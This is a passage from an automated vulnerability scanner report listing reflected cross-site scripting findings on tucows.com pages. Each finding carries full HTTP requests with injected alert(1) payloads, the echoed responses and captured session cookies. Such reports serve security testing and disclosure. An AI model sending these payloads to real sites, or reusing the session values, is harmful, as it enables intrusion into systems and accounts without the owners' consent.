Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesa7005"-alert(1)-"da1cff69e08/newassets/search.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.329. http://www.tucows.com/images/newassets/search.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6080c"-alert(1)-"416c9945040 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets6080c"-alert(1)-"416c9945040/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets6080c"-alert(1)-"416c9945040/search.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.330. http://www.tucows.com/images/newassets/search.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86474"-alert(1)-"fc2d258ee4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/search.html86474"-alert(1)-"fc2d258ee4e HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/search.html86474"-alert(1)-"fc2d258ee4e";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.331. http://www.tucows.com/images/newassets/search.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e494d"-alert(1)-"4b77aa9c219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/search.html?e494d"-alert(1)-"4b77aa9c219=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/search.html?e494d"-alert(1)-"4b77aa9c219=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.332. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8d9"-alert(1)-"92a1570dd92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesaf8d9"-alert(1)-"92a1570dd92/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesaf8d9"-alert(1)-"92a1570dd92/newassets/sitemap.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.333. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82496"-alert(1)-"c8a91aceec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets82496"-alert(1)-"c8a91aceec7/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets82496"-alert(1)-"c8a91aceec7/sitemap.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.334. http://www.tucows.com/images/newassets/sitemap.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caf6a"-alert(1)-"44f43ba9b50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/sitemap.htmlcaf6a"-alert(1)-"44f43ba9b50 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/sitemap.htmlcaf6a"-alert(1)-"44f43ba9b50";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.335. http://www.tucows.com/images/newassets/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 220eb"-alert(1)-"e4076721429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/sitemap.html?220eb"-alert(1)-"e4076721429=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/sitemap.html?220eb"-alert(1)-"e4076721429=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.336. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33aa5"-alert(1)-"59cc111f4af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images33aa5"-alert(1)-"59cc111f4af/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images33aa5"-alert(1)-"59cc111f4af/newassets/terms.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.337. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b47ad"-alert(1)-"799fe703e28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsb47ad"-alert(1)-"799fe703e28/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsb47ad"-alert(1)-"799fe703e28/terms.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.338. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 102d4"-alert(1)-"f3c9b91e18e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/terms.html102d4"-alert(1)-"f3c9b91e18e HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/terms.html102d4"-alert(1)-"f3c9b91e18e";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.339. http://www.tucows.com/images/newassets/terms.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eabf"-alert(1)-"20d1d0ffbba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

